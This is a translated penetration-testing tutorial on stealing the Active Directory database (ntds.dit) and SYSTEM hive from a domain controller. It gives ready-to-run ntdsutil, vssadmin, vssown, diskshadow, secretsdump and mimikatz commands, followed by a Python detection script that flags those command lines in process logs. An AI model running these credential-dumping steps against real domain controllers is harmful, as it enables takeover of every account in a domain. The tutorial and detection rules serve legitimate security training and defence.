Internal Network Penetration: Domain Controller Security
Author: 小苏
Extracting ntds.dit:
What ntds.dit is for:
It stores all of the Active Directory data. Once it is decrypted, the account hashes inside it can be obtained and used to forge tickets.
Method one: extract ntds.dit with ntdsutil.exe
Command:
ntdsutil snapshot "activate instance ntds" create quit quit
1. Create a snapshot and note the GUID it returns:
{351d4f2c-7eed-431c-be9a-33f60df84733}
2. Mount the snapshot
Command:
ntdsutil snapshot "mount {351d4f2c-7eed-431c-be9a-33f60df84733}" quit quit
The output of this step shows the directory the snapshot was mounted under.
3. Copy ntds.dit out of the mounted snapshot
Command:
copy C:\$SNAP_202201071706_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\liukaifeng01\Desktop
4. Confirm the snapshot has been deleted (clean up afterwards)
ntdsutil snapshot "List All" quit quit
Method two: extract ntds.dit with vssadmin
1. Create a volume shadow copy of the C: drive
Command:
vssadmin create shadow /for=c:
2. Copy ntds.dit out of the shadow copy just created
Command:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\NTDS\ntds.dit c:\ntds.dit
3. Delete the shadow copy that was created
Command:
vssadmin delete shadows /for=c: /quiet
Method three: extract with the vssown.vbs script
1. Start the Volume Shadow Copy service
cscript vssown.vbs /start
2. Create a shadow copy of the C: drive
cscript vssown.vbs /create c
3. List the current shadow copies
cscript vssown.vbs /list
4. Copy the file out
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\windows\NTDS\ntds.dit c:\ntds.dit
5. Delete the shadow copy (the argument is the shadow copy's GUID from the listing)
cscript vssown.vbs /delete {3D20A65B-9BF8-426A-A15A-92BC04879EF7}
Method four: create a shadow copy with the ntdsutil IFM function
1. Create the IFM media
Command:
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q
2. ntds.dit and the SYSTEM hive are written into that directory; check with:
Command:
dir "c:\test\Active Directory"
dir "c:\test\registry"
3. Copy out the ntds file, then delete the test folder
Command:
rmdir /s /q test
4. The nishang Copy-VSS script can also be used to do the copy
Command:
Import-Module .\Copy-VSS.ps1
Copy-vss
Method five: export ntds.dit with diskshadow
diskshadow ships with Windows; it can execute the commands in a text script file.
Command:
diskshadow /s c:\1.txt
Contents of the txt file:
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec "cmd.exe" /c copy K:\Windows\NTDS\ntds.dit c:\ntds.dit
delete shadows all
list shadows all
reset
exit
Then extract the SYSTEM hive:
reg save hklm\system c:\windows\temp\system.hive
Dumping the hashes from ntds.dit:
Method one: dump with the impacket package
Prerequisite: dumping ntds.dit requires the SYSTEM hive file.
Command:
impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
Method two: obtain the domain hashes with mimikatz
Commands:
privilege::debug
lsadump::lsa /inject
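As an added defensive example (my own code, not from the original post), the Python below turns the command lines used by the methods above into detection rules over process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line logging) and correlates them per host, since a single shadow copy is normal for backup agents but shadow copy plus ntds.dit plus SYSTEM hive on a domain controller is the credential-dump pattern. The log format, rule names and sample events are my own assumptions.

```python
import re

# Command-line patterns for the ntds.dit extraction methods in the write-up.
# Rule names and the log format are my own, not an official taxonomy.
RULES = {
    "ntdsutil snapshot/ifm": re.compile(r"ntdsutil.*(snapshot|ifm|ac i ntds|activate instance)", re.I),
    "vssadmin create/delete shadow": re.compile(r"vssadmin.*(create|delete)\s+shadow", re.I),
    "vssown.vbs": re.compile(r"cscript.*vssown\.vbs", re.I),
    "diskshadow script": re.compile(r"diskshadow(\.exe)?\s+/s\s", re.I),
    "ntds.dit read from shadow copy": re.compile(r"(HarddiskVolumeShadowCopy\d+|\$SNAP_\d+_VOLUME\w+\$).*ntds\.dit", re.I),
    "SYSTEM hive saved": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
    "nishang Copy-VSS": re.compile(r"\bCopy-VSS\b", re.I),
    "mimikatz lsadump": re.compile(r"lsadump::|privilege::debug", re.I),
}

def parse_event(line):
    """Parse a constructed 'ts host=.. user=.. cmdline=<rest>' line; cmdline is last since it has spaces and '='."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(kv.split("=", 1) for kv in head.split() if "=" in kv)
    fields["cmdline"] = cmdline
    return fields

def classify(cmdline):
    """Names of every rule the command line matches (empty list if nothing matched)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(lines):
    """(host, user, cmdline, techniques) for every event that matches at least one rule."""
    events = ((ev, classify(ev["cmdline"])) for ev in map(parse_event, lines))
    return [(ev["host"], ev["user"], ev["cmdline"], hits) for ev, hits in events if hits]

def high_confidence_hosts(lines, min_techniques=2):
    """Hosts on which two or more distinct techniques were seen; a lone shadow
    copy is often a backup agent, several of these steps together is a dump."""
    seen = {}
    for host, _, _, hits in scan(lines):
        seen.setdefault(host, set()).update(hits)
    return sorted(h for h, t in seen.items() if len(t) >= min_techniques)

# Constructed sample events (Sysmon Event ID 1 style, simplified), not real telemetry.
SAMPLE_LOG = [
    r'2022-01-07T17:06:02 host=DC01 user=CORP\admin cmdline=ntdsutil snapshot "activate instance ntds" create quit quit',
    r'2022-01-07T17:07:10 host=DC01 user=CORP\admin cmdline=copy C:\$SNAP_202201071706_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\admin\Desktop',
    r'2022-01-07T17:09:33 host=DC01 user=CORP\admin cmdline=reg save hklm\system c:\windows\temp\system.hive',
    r'2022-01-07T18:00:00 host=FS02 user=CORP\backupsvc cmdline=vssadmin create shadow /for=c:',
    r'2022-01-07T18:01:00 host=WS07 user=CORP\alice cmdline=copy C:\Users\alice\report.docx D:\share',
    r'2022-01-07T18:02:00 host=FS02 user=CORP\backupsvc cmdline=vssadmin list shadows',
]
```

Running `scan(SAMPLE_LOG)` flags the three DC01 steps and the FS02 shadow-copy creation, while `high_confidence_hosts(SAMPLE_LOG)` returns only DC01.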
Original article by moonsec. If you repost it, please credit the source: https://www.moonsec.com/3430.html